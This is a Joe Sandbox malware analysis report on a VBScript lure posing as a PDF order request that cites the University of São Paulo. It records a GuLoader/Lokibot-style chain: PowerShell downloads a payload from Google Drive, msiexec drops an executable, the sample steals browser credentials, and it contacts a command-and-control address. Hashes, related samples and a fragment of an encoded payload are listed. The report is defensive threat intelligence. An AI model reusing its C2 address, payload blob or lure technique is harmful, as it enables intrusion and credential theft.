                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523156 Sample: SOLICITUD DE PEDIDO (Univer... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 26 drive.usercontent.google.com 2->26 28 drive.google.com 2->28 36 Multi AV Scanner detection for domain / URL 2->36 38 Suricata IDS alerts for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 7 other signatures 2->42 8 wscript.exe 1 2->8         started        11 powershell.exe 18 2->11         started        signatures3 process4 signatures5 44 VBScript performs obfuscated calls to suspicious functions 8->44 46 Suspicious powershell command line found 8->46 48 Wscript starts Powershell (via cmd or directly) 8->48 56 2 other signatures 8->56 13 powershell.exe 14 18 8->13         started        50 Writes to foreign memory regions 11->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 11->52 54 Hides threads from debuggers 11->54 17 msiexec.exe 1 96 11->17         started        20 conhost.exe 11->20         started        process6 dnsIp7 30 drive.usercontent.google.com 142.250.184.193, 443, 49705, 49715 GOOGLEUS United States 13->30 32 drive.google.com 142.250.184.238, 443, 49704, 49714 GOOGLEUS United States 13->32 58 Found suspicious powershell code related to unpacking or dynamic code loading 13->58 22 conhost.exe 13->22         started        34 137.184.191.215, 49716, 49717, 49718 PANDGUS United States 17->34 24 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 17->24 dropped 60 Tries to harvest and steal browser information (history, passwords, etc) 17->60 62 Hides threads from debuggers 17->62 file8 signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs8%ReversingLabsWin32.Trojan.Generic
                SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs13%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%VirustotalBrowse
                No Antivirus matches
                SourceDetectionScannerLabelLink
                drive.google.com0%VirustotalBrowse
                drive.usercontent.google.com1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                http://crl.microsoft0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                https://apis.google.com0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://drive.usercontent.google.com1%VirustotalBrowse
                https://github.com/Pester/Pester1%VirustotalBrowse
                https://www.google.com0%VirustotalBrowse
                http://drive.google.com0%VirustotalBrowse
                http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                https://drive.usercontent.google.com/1%VirustotalBrowse
                https://drive.google.com0%VirustotalBrowse
                https://drive.google.com/0%VirustotalBrowse
                http://137.184.191.215/index.php/check.php?s=am9ntjjw15%VirustotalBrowse
                https://drive.usercontent.google.com1%VirustotalBrowse
                NameIPActiveMaliciousAntivirus DetectionReputation
                drive.google.com
                142.250.184.238
                truefalseunknown
                drive.usercontent.google.com
                142.250.184.193
                truefalseunknown
                NameMaliciousAntivirus DetectionReputation
                http://137.184.191.215/index.php/check.php?s=am9ntjjwtrueunknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://drive.usercontent.google.comapowershell.exe, 00000002.00000002.2241557151.00000297D5F05000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://drive.usercontent.google.compowershell.exe, 00000002.00000002.2241557151.00000297D7826000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://crl.microsoftpowershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                  https://go.micropowershell.exe, 00000002.00000002.2241557151.00000297D6650000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://aka.ms/pscore6lBeqpowershell.exe, 00000005.00000002.3029993091.0000000004471000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contoso.com/Iconpowershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://drive.usercontent.googhpowershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://drive.usercontent.google.com/msiexec.exefalseunknown
                      http://drive.google.compowershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.3029993091.00000000045C8000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://www.google.compowershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://crl.micropowershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://drive.google.com/msiexec.exe, 00000007.00000002.3324895722.0000000000B4A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://contoso.com/powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3043556156.00000000054D5000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://drive.google.compowershell.exe, 00000002.00000002.2241557151.00000297D5C97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D74A2000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://drive.usercontent.google.compowershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://drive.googPBpowershell.exe, 00000002.00000002.2241557151.00000297D77E9000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2241557151.00000297D5A71000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://apis.google.compowershell.exe, 00000002.00000002.2241557151.00000297D780F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D5F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D77ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241557151.00000297D7813000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2423603656.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2241557151.00000297D5A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3029993091.0000000004471000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://137.184.191.215/index.php/check.php?s=am9ntjjwYmsiexec.exe, 00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            142.250.184.193
                            drive.usercontent.google.comUnited States
                            15169GOOGLEUSfalse
                            137.184.191.215
                            unknownUnited States
                            11003PANDGUStrue
                            142.250.184.238
                            drive.google.comUnited States
                            15169GOOGLEUSfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1523156
                            Start date and time:2024-10-01 07:42:00 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 13s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
                            renamed because original name is a hash value
                            Original Sample Name:SOLICITUD DE PEDIDO (Universidade de So Paulo (USP))09-30-2024pdf.vbs
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winVBS@8/10@2/3
                            EGA Information:Failed
                            HCA Information:
                            • Successful, ratio: 86%
                            • Number of executed functions: 35
                            • Number of non-executed functions: 1
                            Cookbook Comments:
                            • Found application associated with file extension: .vbs
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target msiexec.exe, PID 2584 because there are no executed function
                            • Execution Graph export aborted for target powershell.exe, PID 5588 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 5972 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            TimeTypeDescription
                            01:42:57API Interceptor88x Sleep call for process: powershell.exe modified
                            01:43:41API Interceptor28x Sleep call for process: msiexec.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            137.184.191.215Bnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/039
                            PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/check.php?s=am9ntjjw
                            Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/check.php?s=am9ntjjw
                            B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/10899
                            ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/039
                            DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/10899
                            INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/check.php?s=am9ntjjw
                            #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/check?post=073989953
                            U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/10899
                            po.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215/index.php/wp.php?view=1
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            PANDGUSBnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                            • 155.120.253.229
                            PERMINTAAN ANGGARAN (Universitas IPB) ID177888.vbeGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            Happy Fiestas Patrias#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            B#U00dcDC#U018f SOR#U011eU 09-24-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            ____.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            DIR-A_FB09948533#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            https://forms.office.com/Pages/ShareFormPage.aspx?id=atlxJ-ZfTkmpiBz5GOrQZra6YH8IF9tJvDnK9FEosBRUNUoySTNMSlhENTkyTjRFS0pYUFBWREJDVS4u&sharetoken=VjI7W44Fh45blPkj2SeDGet hashmaliciousHTMLPhisherBrowse
                            • 137.184.252.128
                            INVITACI#U00d3N A COTIZAR Nueva cervecer#U00eda NUEVA CERVECER#U00cdA.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            #U017d#U00c1DOST O ROZPO#U010cET 09-23-2024#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                            • 137.184.191.215
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eRecibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            mtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            invoice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            file.exeGet hashmaliciousUnknownBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            37f463bf4616ecd445d4a1937da06e19Recibo de transferencia#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            file.exeGet hashmaliciousLodaRATBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            file.exeGet hashmaliciousXWorm, XmrigBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                            • 142.250.184.193
                            • 142.250.184.238
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Roaming\188E93\31437F.exeBnnebgers.vbsGet hashmaliciousGuLoader, LokibotBrowse
                              C7jdH7geD6.exeGet hashmaliciousUnknownBrowse
                                setup.exeGet hashmaliciousUnknownBrowse
                                  #U67e5#U8be2#U5165#U53e3.exeGet hashmaliciousUnknownBrowse
                                    sample.exeGet hashmaliciousUnknownBrowse
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8003
                                      Entropy (8bit):4.840877972214509
                                      Encrypted:false
                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                      MD5:106D01F562D751E62B702803895E93E0
                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):1.1940658735648508
                                      Encrypted:false
                                      SSDEEP:3:Nlllulbnolz:NllUc
                                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:@...e................................................@..........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):59904
                                      Entropy (8bit):5.770776695007155
                                      Encrypted:false
                                      SSDEEP:768:uo8HL2TB4LHLbo77Q2d9xSDvYD07BOUp8VKfTKznHVXq6ayYf3:vTB4LG7B8jY4XprIHw62
                                      MD5:9D09DC1EDA745A5F87553048E57620CF
                                      SHA1:1D0C7CFCA8104D06DE1F08B97F28B3520C246CD7
                                      SHA-256:3A90EDE157D40A4DB7859158C826F7B4D0F19A5768F6483C9BE6EE481C6E1AF7
                                      SHA-512:2BE940F0468F77792C6E1B593376900C24FF0B0FAE8DC2E57B05596506789AA76119F8BE780C57252F74CD1F0C2FA7223FE44AE4FA3643C26DF00DD42BD4C016
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: Bnnebgers.vbs, Detection: malicious, Browse
                                      • Filename: C7jdH7geD6.exe, Detection: malicious, Browse
                                      • Filename: setup.exe, Detection: malicious, Browse
                                      • Filename: #U67e5#U8be2#U5165#U53e3.exe, Detection: malicious, Browse
                                      • Filename: sample.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...tkq.tkq.tkq.`.r.skq.`.t.zkq.`.p.ykq.tkp..kq.`.x.wkq.`.u.=kq.`...ukq.`.s.ukq.Richtkq.........PE..L....E.%.....................^......0.............@.......................... ......\.....@...... ...................................................................(..T...............................@.......................@....................text...d........................... ..`.data...............................@....idata..............................@..@.didat..L...........................@....rsrc............ ..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Preview:1
                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):47
                                      Entropy (8bit):1.168829563685559
                                      Encrypted:false
                                      SSDEEP:3:/lSll2DQi:AoMi
                                      MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                      SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                      SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                      SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                      Malicious:false
                                      Preview:........................................user.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):461600
                                      Entropy (8bit):5.957335301260107
                                      Encrypted:false
                                      SSDEEP:6144:bKdcsXZVrd+5wyjTrMzq8EfyCxpwhwn1PkXwxjEgj/p9pJMXMr270G0Rzns7ZU:m2YZVsfeq8EfPxpDn5tZEIvpQgnRzmm
                                      MD5:1521E3592BA392D4637215A10F3CEA58
                                      SHA1:9E384CA5D1E60ED2DDE3318DF27EB42DC898E944
                                      SHA-256:92C6A957B74A05D545E693BE9A5726DF0B6192517D3B60922A53C33DC6036D0B
                                      SHA-512:F3ED6AD10EC73D5BF1AD4F253A2D078D3CBD31779DA08E6B475814C59AD1B7C9C9A446D181DE7E36CB447847ADF8D9754DB65870BC22751FBDF867F8EC587E19
                                      Malicious:false
                                      Preview:6wJGNXEBm7tTKREAcQGbcQGbA1wkBOsCj0lxAZu53lkNG+sC+xFxAZuB6c6M3wpxAZtxAZuB8RDNLRBxAZvrAqJy6wKMKXEBm7rM3bHpcQGbcQGbcQGb6wLeaDHKcQGbcQGbiRQL6wKdYXEBm9Hi6wKrxHEBm4PBBOsCl3rrAoS1gfltqXIDfMvrAjaK6wK3gotEJARxAZvrAoZMicPrAvracQGbgcOBPLUB6wKpa+sCGCK6AHRrPusCRGnrAk1ngfLC8UCicQGb6wLaGoHCPnrUY3EBm+sCRdpxAZvrAls1cQGb6wIUxIsMEHEBm+sCYe+JDBNxAZvrAgz1QusCKHfrAi+Sgfok0AQAddTrAr8jcQGbiVwkDHEBm+sCCVGB7QADAABxAZvrAqrhi1QkCOsC47txAZuLfCQE6wIJDesCcQSJ6+sCSqbrAuzYgcOcAAAAcQGb6wIk5VPrAgE16wInmWpA6wI9zHEBm4nrcQGbcQGbx4MAAQAAAOCGA3EBm3EBm4HDAAEAAHEBm+sCo85TcQGb6wIJcYnr6wIH9XEBm4m7BAEAAOsCis9xAZuBwwQBAADrAuhm6wLSplPrAqkG6wKfAWr/6wIadOsCNcODwgVxAZtxAZsx9usCAYRxAZsxyXEBm3EBm4sacQGbcQGbQXEBm3EBmzkcCnX06wLb3OsCXFhGcQGbcQGbgHwK+7h13usCcuVxAZuLRAr8cQGb6wK5kSnwcQGb6wKWoP/S6wJWoHEBm7ok0AQAcQGbcQGbMcDrAsTA6wJ0Dot8JAzrAqyYcQGbgTQHCb3/UXEBm+sCPyCDwARxAZtxAZs50HXlcQGb6wLQson7cQGbcQGb/9dxAZvrAo5CjGZ7vIBYONQ1QgCuAIcrLIg4w672Qv1VuVB+5DVCAK6W++38iBDDrvZCaySfe7OuhIEArvbICAQxUXa0sNpiLJA5C9D4LuKkhjkJ0PixtH+WPD5xPeSJaeWELroo58YSd9UE
                                      File type:ASCII text, with CRLF line terminators
                                      Entropy (8bit):4.914998043107827
                                      TrID:
                                      • Visual Basic Script (13500/0) 100.00%
